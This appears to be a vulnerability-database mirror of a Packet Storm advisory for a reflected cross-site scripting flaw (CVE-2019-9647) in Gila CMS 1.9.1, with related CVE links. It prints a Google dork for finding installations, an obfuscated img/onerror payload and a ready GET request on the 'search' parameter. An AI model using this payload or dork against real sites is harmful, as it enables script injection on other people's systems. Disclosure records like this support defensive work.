Lucene search
Ahmet Umit BayramPACKETSTORM:152153HistoryMar 19, 2019 - 12:00 a.m.
Gila CMS 1.9.1 Cross Site Scripting
2019-03-1900:00:00
Ahmet Umit Bayram
packetstormsecurity.com
47
EPSS
0.002
Percentile
51.8%
`# Exploit Title: Gila CMS (search) Cross Site Scripting
# Google Dork: intext:"Powered By Gila CMS"
# Date: 11.03.2019
# Exploit Author: Ahmet Γmit BAYRAM
# Vendor Homepage: https://gilacms.com
# Software Link: https://gilacms.com/packages/downloadRelease/1.9.1.zip
# Demo Site: https://gilacms.com/demo/
# Version: 1.9.1
# Tested on: Kali Linux
# CVE: CVE-2019-9647
# Vulnerable Parameter: search
# Payload: <--`<img/src=` onerror=confirm``> --!>
# GET Request: http://localhost/?search=<--`<img/src=` onerror=confirm``> --!>
`
Related
cvelist
cvelist
CVE-2019-9647
2019-06-05 15:52:57
CVE-2019-17535
2019-10-13 17:52:21
nvd
nvd
CVE-2019-9647
2019-06-05 16:29:01
CVE-2019-17535
2019-10-13 18:15:10
cve
cve
CVE-2019-9647
2019-06-05 16:29:01
CVE-2019-17535
2019-10-13 18:15:10
prion
prion
Cross site scripting
2019-06-05 16:29:00
Design/Logic Flaw
2019-10-13 18:15:00
exploitdb
exploitdb
Gila CMS 1.9.1 - Cross-Site Scripting
2019-03-19 00:00:00
zdt
zdt
Gila CMS 1.9.1 - Cross-Site Scripting Vulnerability
2019-03-19 00:00:00
exploitpack
exploitpack
Gila CMS 1.9.1 - Cross-Site Scripting
2019-03-19 00:00:00